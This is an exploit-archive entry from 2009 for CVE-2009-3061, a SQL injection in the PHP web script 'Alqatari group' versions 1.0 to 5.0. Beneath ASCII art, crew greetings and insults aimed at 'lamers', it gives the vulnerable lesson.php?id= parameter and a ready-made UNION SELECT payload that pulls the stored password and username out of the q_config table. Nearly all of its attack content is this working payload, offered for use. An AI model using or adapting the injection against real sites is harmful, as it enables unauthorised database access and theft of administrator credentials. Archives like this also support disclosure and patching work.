Alqatari group 1.0 < 5.0 - 'id' SQL Injection

Author: Red-D3v1L
type: webapps
platform: php
port: 
date_added: 2009-12-07 
date_updated:  
verified: 0 
codes: CVE-2009-3061;OSVDB-57609 
tags: 
aliases:  
screenshot_url:  
application_url: 

      _ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _\/   _ _ /   \      \<   |/_ _   /         /\   |     \    /\  ||   \( )   /\  |  \  (| |
    \_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\  | (O) /   /+~\ ||_O_|( )  /0O\ |   \  | |
     _ _ _ _\  \_ _ \  \ _ _ _   |     \  |  | /   /_ _      /|__|\ |     \  /|__|\|| O |( ) /+__+\| ^  \ | |
   /_ _ _ _ _\ _ _ _/\ _ _ _ /   |__|\__\ |__|/_ _ _ _ _\   /\|  |/\|__|\__\( )  ( )|___/(_)/\|  |/\__\__\|_ >


==============================================================================
        [ª] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [ª]  Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability
==============================================================================
    [ª] my home:             [ http://sec-r1z.com ]
    [ª] Script:              [ Alqatari group Version 1.0 ]
    [ª] Language:            [ PHP ]
    [ª] Founder:             [ ./Red-D3v1L ]
    [ª] Gr44tz to:           [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    [ª] Fuck to :            [ All LamErZ And n00bz ]
########################################################################

===[ Exploit SQL ]===

 [ª] [Path]/lesson.php?id=[SQL]

 [ª] Live dem0 :

http://www.site.com/lesson.php?id=-258+union+select+concat%28c_pass,0x3e,c_user%29,2,3+from+q_config


Author: Red-D3v1L <-

###########################################################################